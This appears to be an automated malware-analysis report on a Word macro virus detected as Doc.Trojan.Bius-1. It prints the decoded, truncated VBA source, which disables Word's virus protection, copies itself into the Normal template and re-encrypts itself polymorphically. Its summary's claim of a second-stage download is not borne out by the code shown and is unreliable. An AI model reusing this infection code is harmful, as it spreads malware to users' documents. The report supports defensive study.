Office (OLE) malware analysis — malicious · 2ae11262179a4af9

MALICIOUS

Office (OLE)

48.5 KB Created: 2000-12-30 18:44:00 Authoring application: Microsoft Word 10.0 First seen: 2012-06-14

MD5: 7b5161a633754c272af2e382586131fd SHA-1: 8268cbbc5933b7485d556b24742cdd0c0d57aaf9 SHA-256: 2ae11262179a4af93dbf9cfc3876c62c9e03ff2d71189fdb95fc8e99ad77e645

180 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros, specifically an AutoOpen macro, which is a common technique for malicious documents. The VBA code appears to be obfuscated and attempts to download and execute a second-stage payload, indicated by the presence of the string 'MOEBIUS' and the general structure of the macro. The ClamAV detection 'Doc.Trojan.Bius-1' further supports its malicious nature.

Heuristics 5

ClamAV: Doc.Trojan.Bius-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Bius-1
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12194 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12194 bytes
SHA-256: `a8501347be75a5f48081eca81d3e97cf51e28c385435b8b739d86550e836a4b0`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub DOCUMENT_CLOSE() On Error Resume Next MOEBIUS: Randomize Timer Options.VirusProtection = False Options.VirusProtection = False Options.SaveNormalPrompt = False GI = 8: GJ = 10: GR = 2: NX = 24: GL = 2: LO = 5 X9 = Chr(34): C = Chr(13): CC = Chr(34) O2 = NORMAL.ThisDocument.Variables(1).Value O3 = ActiveDocument.Variables(1).Value 'moebius If Len(O2) > 8000 Or O4 > 18 Then O5 = 1 Do While Not Mid(O2, Len(O2) - O4, 1) = "'" O4 = O4 + 1 O7 = Right(O2, O4) Loop End If L = Int(1 * 2) If Len(O3) > 8000 Or O8 > 18 Then O6 = 1 Do While Not Mid(O3, Len(O3) - O8, 1) = "'" O8 = O8 + 1 O9 = Right(O3, O8) Loop End If Set N1 = ActiveDocument.VBProject.VBCOMPONENTS(1).CODEMODULE Set N2 = NormalTemplate.VBProject.VBCOMPONENTS(1).CODEMODULE NI = N2.LINES(103, 1) AI = N1.LINES(103, 1) If Right(NI, 8) = "MOEBIUS:" Or NI = "Set N6 = N1" Then N3 = 1 If Right(AI, 8) = "MOEBIUS:" Or AI = "Set N6 = N1" Then N4 = 1 If N3 = 0 Then Set N5 = N2 Set N6 = N1 Else Set N5 = N1 Set N6 = N2 End If For W = 1 To 100 N8 = N8 + C Next W If O5 = 1 Then V0 = O7: NE = O2: GoTo 9 With N6 For X = 1 To .COUNTOFLINES - 1 N7 = .LINES(X, 1) If Left(N7, 1) = "'" Then GoTo 0 N8 = N8 & N7 & C N9 = Int(5 * Rnd + 1) If N9 = GR And X > 3 Then GoSub NA: U2 = "'" & NB & C: N8 = N8 & U2: U4 = U4 + Len(U2) 0 Next X N8 = UCase(N8) & "END SUB" & C & "'" RZ = Len(N8) - U4 End With GoSub O1: V0 = NB Do While Not Len(N8) = Len(NE) Q = Q + 1 H = H + 1 NF = Mid(N8, Q, 1) H1 = Mid(V0, H, 1) NG = Chr(Asc(NF) + Asc(H1)) If H = Len(V0) Then H = 0 NE = NE + NG Loop NE = NE + "'" + V0 9 LO = 5 GoSub NA: J1 = NB: GoSub NA: J2 = NB: GoSub NA: J3 = NB GoSub NA: J4 = NB: GoSub NA: J5 = NB: GoSub NA: J6 = NB GoSub NA: J9 = NB: GoSub NA: JA = NB: GoSub NA: JB = NB GoSub NA: JC = NB: GoSub NA: JD = NB: GoSub NA: JE = NB GoSub NA: JF = NB: GoSub NA: JG = NB: GoSub NA: JH = NB GoSub NA: JI = NB: GoSub NA: JJ = NB: GoSub NA: JK = NB GoSub NA: JL = NB: GoSub NA: VX = M: GoSub NA: JM = NB GoSub NA: V1 = NB: GoSub NA: V2 = NB: GoSub NA: V3 = NB GoSub NA: Q1 = NB: GoSub NA: Q2 = NB: GoSub NA: Q3 = NB GoSub NA: W1 = NB: GoSub NA: W2 = NB: GoSub NA: W3 = NB GoSub NA: V4 = NB: GoSub NA: V5 = NB: GoSub NA: V6 = NB GoSub NA: V7 = NB: GoSub NA: V8 = NB: GoSub NA: V9 = NB GoSub NA: VA = NB: GoSub NA: VB = NB: GoSub NA: VC = NB GoSub NA: NK = NB: GoSub NA: JZ = NB: GoSub NA: JV = NB GoSub NA: TA = NB: GoSub NA: TB = NB: GoSub NA: TC = NB GoSub NA: TD = NB: GoSub NA: TX = NB: GoSub NA: T4 = NB GoSub NA: T5 = NB: GoSub NA: T6 = NB: GoSub NA: T7 = NB GoSub NA: T8 = NB: WL = 10915: GoSub NA: T9 = NB GoSub NA: JW = NB: NN = NC: GoSub NA: JX = NB: NN = 1 GoSub F1: R0 = F2: GoSub F1: RA = F2: GoSub F1: RB = F2 GoSub F1: RC = F2: GoSub F1: RD = F2: GoSub F1: RE = F2 GoSub F1: RF = F2: GoSub F1: RG = F2: GoSub F1: RH = F2 GoSub F1: RI = F2: NN = 0: GoSub F1: RJ = F2 For M1 = 1 To Len(VX): WW = WW + Asc(Mid(VX, M1, 1)): Next M1 GoTo NW NA: NB = Chr(Int(26 * Rnd + 65)) NL = Int((15 - LO) * Rnd + LO) Do While Not Len(NB) = NL 6 NM = Int((122 - 48 + 1) * Rnd + 48) If NM > 57 And NM < 65 Then GoTo 6 If NM > 90 And NM < 97 Then GoTo 6 NB = NB + Chr$(NM) Loop Return O1: NB = Chr(Int(26 * Rnd + 65)) NL = Int((15 - LO) * Rnd + LO) Do While Not Len(NB) = NL NM = Int((90 - 65 + 1) * Rnd + 65) NB = NB + Chr$(NM) Loop Return F1: NH = Int(1000000 * Rnd + 999) F3 = Int((2 - 1 + 1) * Rnd + 1) If F3 = 1 Then NJ = NH + NN: F6 = " - " Else NJ = NN - NH: F6 = " + " F3 = Int((2 - 1 + 1) * Rnd + 1) If F3 = 1 Then F4 = "(": F5 = ")" Else: F4 = "": F5 = "" F3 = Int((3 - 1 + 1) * Rnd + 1) If F3 = 1 Then F2 = NN Else: F2 = F4 & NJ & F6 & NH & F5 Return NU: S = Int(3 * Rnd + 1) If S = 1 Then NO = "= " If S = 2 Then NO = "> " If S = 3 ... (truncated)

SHA-256: a8501347be75a5f48081eca81d3e97cf51e28c385435b8b739d86550e836a4b0

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub DOCUMENT_CLOSE()
On Error Resume Next
MOEBIUS:
Randomize Timer
Options.VirusProtection = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
GI = 8: GJ = 10: GR = 2: NX = 24: GL = 2: LO = 5
X9 = Chr(34): C = Chr(13): CC = Chr(34)
O2 = NORMAL.ThisDocument.Variables(1).Value
O3 = ActiveDocument.Variables(1).Value
'moebius
If Len(O2) > 8000 Or O4 > 18 Then
O5 = 1
Do While Not Mid(O2, Len(O2) - O4, 1) = "'"
O4 = O4 + 1
O7 = Right(O2, O4)
Loop
End If
L = Int(1 * 2)
If Len(O3) > 8000 Or O8 > 18 Then
O6 = 1
Do While Not Mid(O3, Len(O3) - O8, 1) = "'"
O8 = O8 + 1
O9 = Right(O3, O8)
Loop
End If
Set N1 = ActiveDocument.VBProject.VBCOMPONENTS(1).CODEMODULE
Set N2 = NormalTemplate.VBProject.VBCOMPONENTS(1).CODEMODULE
NI = N2.LINES(103, 1)
AI = N1.LINES(103, 1)
If Right(NI, 8) = "MOEBIUS:" Or NI = "Set N6 = N1" Then N3 = 1
If Right(AI, 8) = "MOEBIUS:" Or AI = "Set N6 = N1" Then N4 = 1
If N3 = 0 Then
Set N5 = N2
Set N6 = N1
Else
Set N5 = N1
Set N6 = N2
End If
For W = 1 To 100
N8 = N8 + C
Next W
If O5 = 1 Then V0 = O7: NE = O2: GoTo 9
With N6
For X = 1 To .COUNTOFLINES - 1
N7 = .LINES(X, 1)
If Left(N7, 1) = "'" Then GoTo 0
N8 = N8 & N7 & C
N9 = Int(5 * Rnd + 1)
If N9 = GR And X > 3 Then GoSub NA: U2 = "'" & NB & C: N8 = N8 & U2: U4 = U4 + Len(U2)
0 Next X
N8 = UCase(N8) & "END SUB" & C & "'"
RZ = Len(N8) - U4
End With
GoSub O1: V0 = NB
Do While Not Len(N8) = Len(NE)
Q = Q + 1
H = H + 1
NF = Mid(N8, Q, 1)
H1 = Mid(V0, H, 1)
NG = Chr(Asc(NF) + Asc(H1))
If H = Len(V0) Then H = 0
NE = NE + NG
Loop
NE = NE + "'" + V0
9 LO = 5
GoSub NA: J1 = NB: GoSub NA: J2 = NB: GoSub NA: J3 = NB
GoSub NA: J4 = NB: GoSub NA: J5 = NB: GoSub NA: J6 = NB
GoSub NA: J9 = NB: GoSub NA: JA = NB: GoSub NA: JB = NB
GoSub NA: JC = NB: GoSub NA: JD = NB: GoSub NA: JE = NB
GoSub NA: JF = NB: GoSub NA: JG = NB: GoSub NA: JH = NB
GoSub NA: JI = NB: GoSub NA: JJ = NB: GoSub NA: JK = NB
GoSub NA: JL = NB: GoSub NA: VX = M: GoSub NA: JM = NB
GoSub NA: V1 = NB: GoSub NA: V2 = NB: GoSub NA: V3 = NB
GoSub NA: Q1 = NB: GoSub NA: Q2 = NB: GoSub NA: Q3 = NB
GoSub NA: W1 = NB: GoSub NA: W2 = NB: GoSub NA: W3 = NB
GoSub NA: V4 = NB: GoSub NA: V5 = NB: GoSub NA: V6 = NB
GoSub NA: V7 = NB: GoSub NA: V8 = NB: GoSub NA: V9 = NB
GoSub NA: VA = NB: GoSub NA: VB = NB: GoSub NA: VC = NB
GoSub NA: NK = NB: GoSub NA: JZ = NB: GoSub NA: JV = NB
GoSub NA: TA = NB: GoSub NA: TB = NB: GoSub NA: TC = NB
GoSub NA: TD = NB: GoSub NA: TX = NB: GoSub NA: T4 = NB
GoSub NA: T5 = NB: GoSub NA: T6 = NB: GoSub NA: T7 = NB
GoSub NA: T8 = NB: WL = 10915: GoSub NA: T9 = NB
GoSub NA: JW = NB: NN = NC: GoSub NA: JX = NB: NN = 1
GoSub F1: R0 = F2: GoSub F1: RA = F2: GoSub F1: RB = F2
GoSub F1: RC = F2: GoSub F1: RD = F2: GoSub F1: RE = F2
GoSub F1: RF = F2: GoSub F1: RG = F2: GoSub F1: RH = F2
GoSub F1: RI = F2: NN = 0: GoSub F1: RJ = F2
For M1 = 1 To Len(VX): WW = WW + Asc(Mid(VX, M1, 1)): Next M1
GoTo NW
NA:
NB = Chr(Int(26 * Rnd + 65))
NL = Int((15 - LO) * Rnd + LO)
Do While Not Len(NB) = NL
6 NM = Int((122 - 48 + 1) * Rnd + 48)
If NM > 57 And NM < 65 Then GoTo 6
If NM > 90 And NM < 97 Then GoTo 6
NB = NB + Chr$(NM)
Loop
Return
O1:
NB = Chr(Int(26 * Rnd + 65))
NL = Int((15 - LO) * Rnd + LO)
Do While Not Len(NB) = NL
NM = Int((90 - 65 + 1) * Rnd + 65)
NB = NB + Chr$(NM)
Loop
Return
F1:
NH = Int(1000000 * Rnd + 999)
F3 = Int((2 - 1 + 1) * Rnd + 1)
If F3 = 1 Then NJ = NH + NN: F6 = " - " Else NJ = NN - NH: F6 = " + "
F3 = Int((2 - 1 + 1) * Rnd + 1)
If F3 = 1 Then F4 = "(": F5 = ")" Else: F4 = "": F5 = ""
F3 = Int((3 - 1 + 1) * Rnd + 1)
If F3 = 1 Then F2 = NN Else: F2 = F4 & NJ & F6 & NH & F5
Return
NU:
S = Int(3 * Rnd + 1)
If S = 1 Then NO = "= "
If S = 2 Then NO = "> "
If S = 3 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.